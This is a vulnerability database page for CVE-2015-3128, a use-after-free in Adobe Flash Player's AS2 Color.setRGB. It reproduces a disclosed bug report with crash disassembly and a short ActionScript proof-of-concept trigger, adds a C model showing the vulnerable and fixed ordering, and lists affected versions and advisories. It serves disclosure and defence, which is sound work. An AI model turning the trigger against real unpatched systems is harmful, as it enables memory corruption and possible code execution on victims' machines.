CVE-2015-3128 : Detail

CVE-2015-3128

Attack vector: Network
Published: 2015-07-09 14:00 UTC
Last modified: 2017-09-21 07:57 UTC

CVE Description

Use-after-free vulnerability in Adobe Flash Player before 13.0.0.302 and 14.x through 18.x before 18.0.0.203 on Windows and OS X and before 11.2.202.481 on Linux, Adobe AIR before 18.0.0.180, Adobe AIR SDK before 18.0.0.180, and Adobe AIR SDK & Compiler before 18.0.0.180 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-3118, CVE-2015-3124, CVE-2015-3127, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, and CVE-2015-5117.

CVE Information

Metrics

CVSS version: v2
Score: 10.0
Severity: High
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C (network-reachable, low complexity, no authentication, complete loss of confidentiality, integrity and availability)
Source: [email protected]

EPSS

The Exploit Prediction Scoring System (EPSS) is a scoring model that predicts the likelihood of a vulnerability being exploited in the wild.

EPSS Score

The EPSS model produces a probability between 0 and 1 (0% to 100%). The higher the score, the greater the estimated probability that the vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is predicted to be more likely to be exploited than 95% of all other CVEs. The percentile is therefore the value to use when comparing one CVE's EPSS score against the rest.

Exploit information

Exploit Database EDB-ID: 37860

Publication date: 2015-08-18 22:00 UTC
Author: bilou
EDB Verified: Yes

Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---

VULNERABILITY DETAILS

When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.

VERSION

Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1

REPRODUCTION CASE

The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.

(These lines come from flashplayer17_sa.exe 17.0.0.169):

    .text:004B82D0 push    esi
    .text:004B82D1 mov     esi, [esp+4+arg_0]
    .text:004B82D5 push    edi
    .text:004B82D6 mov     edi, ecx
    .text:004B82D8 mov     ecx, [edi+94h]      ; edi points to freed memory
    .text:004B82DE and     ecx, 0FFFFFFFEh
    .text:004B82E1 add     ecx, 3Ch
    .text:004B82E4 mov     eax, esi
    .text:004B82E6 call    sub_4B0724          ; crash below
    ...
    .text:004B0724 mov     edx, [ecx]          ; crash here ecx = 3ch (null pointer)
    .text:004B0726 cmp     edx, [eax]
    .text:004B0728 jnz     short loc_4B077E

Compile the poc with Flash CS5.5

***************************************************************************
Content of as2_color_uaf.fla:

    // Create the TextField that will serve as the Color's target_mc
    var tf:TextField = this.createTextField("tf", 1, 1, 1, 4, 4);

    // Custom object whose valueOf runs when setRGB coerces its argument to a number
    var o = new Object();
    o.valueOf = function () {
        tf.removeTextField();   // frees the target while native code still holds a pointer to it
        return 0x41414142;      // attacker-chosen value handed back to setRGB
    };

    var c = new Color(tf);      // native Color object caches a pointer to tf
    c.setRGB(o);                // coercing o calls valueOf -> tf freed -> use-after-free

---

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip
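The ordering problem bilou describes (native code takes the target pointer, then coerces the argument, and the script run by that coercion frees the target) can be modelled without Flash. The following is an added C example, not code from the original post, from Exploit-DB, or from Adobe: a toy object arena stands in for the AVM heap, evil_valueOf models the PoC's o.valueOf, and color_setRGB_vuln / color_setRGB_fixed are assumed names that show the vulnerable ordering beside a hardened one that finishes every script-visible coercion before touching the target and then re-resolves it through a handle.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example: a minimal C model of the CVE-2015-3128 pattern, where a
 * script callback frees the operation's target while native code still
 * holds a raw pointer to it.  All names, structures and the arena are
 * assumptions for illustration, not Flash Player internals. */

/* Toy object arena.  A freed slot is poisoned and marked dead instead of
 * being handed back to malloc, so the stale write is observable rather
 * than undefined behaviour. */
typedef struct {
    int      live;
    uint32_t rgb;
} TextFieldObj;

typedef struct {
    size_t slot;                 /* index into the arena, not a raw pointer */
} TargetHandle;

#define ARENA_SLOTS 4
static TextFieldObj g_arena[ARENA_SLOTS];

static TargetHandle tf_create(uint32_t rgb) {
    for (size_t i = 0; i < ARENA_SLOTS; i++) {
        if (!g_arena[i].live) {
            g_arena[i].live = 1;
            g_arena[i].rgb  = rgb;
            return (TargetHandle){ i };
        }
    }
    abort();                     /* toy arena exhausted */
}

/* Models TextField.removeTextField(): the object is gone after this. */
static void tf_remove(TargetHandle h) {
    g_arena[h.slot].live = 0;
    g_arena[h.slot].rgb  = 0xDEADBEEF;   /* poison, like a freed chunk */
}

/* Returns NULL once the target has been freed. */
static TextFieldObj *tf_resolve(TargetHandle h) {
    return g_arena[h.slot].live ? &g_arena[h.slot] : NULL;
}

/* Script-visible value whose numeric coercion may run arbitrary script,
 * exactly like an AS2 object with a user-defined valueOf. */
typedef struct {
    int    is_number;
    double num;
    double (*valueOf)(void *ctx);
    void  *ctx;
} Value;

static double to_number(const Value *v) {
    return v->is_number ? v->num : v->valueOf(v->ctx);
}

/* Vulnerable ordering: grab the raw pointer, then coerce the argument,
 * then write through the pointer.  Returns 1 if the write landed in a dead
 * slot (a real UAF in the original), 0 if the target was still alive. */
static int color_setRGB_vuln(TargetHandle target, const Value *arg) {
    TextFieldObj *tf = tf_resolve(target);
    if (!tf) return -1;
    uint32_t rgb = (uint32_t)to_number(arg);   /* may run script that frees tf */
    int stale = !tf->live;
    tf->rgb = rgb;                              /* write through possibly-freed object */
    return stale;
}

/* Hardened ordering: run every script-visible coercion first, then
 * re-resolve the handle and refuse to proceed if the target died. */
static int color_setRGB_fixed(TargetHandle target, const Value *arg) {
    uint32_t rgb = (uint32_t)to_number(arg);
    TextFieldObj *tf = tf_resolve(target);
    if (!tf) return -1;                          /* target freed during coercion */
    tf->rgb = rgb;
    return 0;
}

/* Malicious valueOf, as in the PoC: free the Color's target and return an
 * attacker-chosen number. */
static double evil_valueOf(void *ctx) {
    tf_remove(*(TargetHandle *)ctx);
    return (double)0x41414142;
}

/* Runs the PoC sequence against either implementation and returns its result. */
static int demo(int hardened) {
    memset(g_arena, 0, sizeof g_arena);
    TargetHandle tf = tf_create(0x000000);       /* var tf = createTextField(...) */
    Value o = { 0, 0.0, evil_valueOf, &tf };     /* o.valueOf = function(){ tf.removeTextField(); ... } */
    return hardened ? color_setRGB_fixed(tf, &o) : color_setRGB_vuln(tf, &o);
}

int main(void) {
    printf("vulnerable ordering wrote into a dead object: %d\n", demo(0));
    printf("hardened ordering result (-1 = target gone, refused): %d\n", demo(1));
    return 0;
}
```

Freed slots are poisoned rather than returned to the allocator so that the stale write can be checked instead of corrupting the heap; in a real engine the corresponding fix is either to hold a GC-protected reference to the target across any call that can re-enter script, or to re-validate the target after the call returns, as color_setRGB_fixed does.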

Products Mentioned

Configuration: Adobe AIR (all platforms)

Adobe >> AIR >> versions up to and including 18.0.0.144
Adobe >> AIR SDK >> versions up to and including 18.0.0.144
Adobe >> AIR SDK & Compiler >> versions up to and including 18.0.0.144

Configuration: Adobe Flash Player on Windows and OS X

Adobe >> Flash Player >> versions up to and including 13.0.0.289
Adobe >> Flash Player >> 14.0.0.125
Adobe >> Flash Player >> 14.0.0.145
Adobe >> Flash Player >> 14.0.0.176
Adobe >> Flash Player >> 14.0.0.179
Adobe >> Flash Player >> 15.0.0.152
Adobe >> Flash Player >> 15.0.0.167
Adobe >> Flash Player >> 15.0.0.189
Adobe >> Flash Player >> 15.0.0.223
Adobe >> Flash Player >> 15.0.0.239
Adobe >> Flash Player >> 15.0.0.246
Adobe >> Flash Player >> 16.0.0.235
Adobe >> Flash Player >> 16.0.0.257
Adobe >> Flash Player >> 16.0.0.287
Adobe >> Flash Player >> 16.0.0.296
Adobe >> Flash Player >> 17.0.0.134
Adobe >> Flash Player >> 17.0.0.169
Adobe >> Flash Player >> 17.0.0.188
Adobe >> Flash Player >> 17.0.0.190
Adobe >> Flash Player >> 18.0.0.160
Adobe >> Flash Player >> 18.0.0.194
Apple >> Mac OS X >> any version
Microsoft >> Windows >> any version

Configuration: Adobe Flash Player on Linux

Adobe >> Flash Player >> versions up to and including 11.2.202.468
Linux >> Linux kernel >> any version

References

http://www.securitytracker.com/id/1032810 (vdb-entry, SECTRACK)
http://rhn.redhat.com/errata/RHSA-2015-1214.html (vendor-advisory, REDHAT)
https://security.gentoo.org/glsa/201507-13 (vendor-advisory, GENTOO)
http://www.securityfocus.com/bid/75590 (vdb-entry, BID)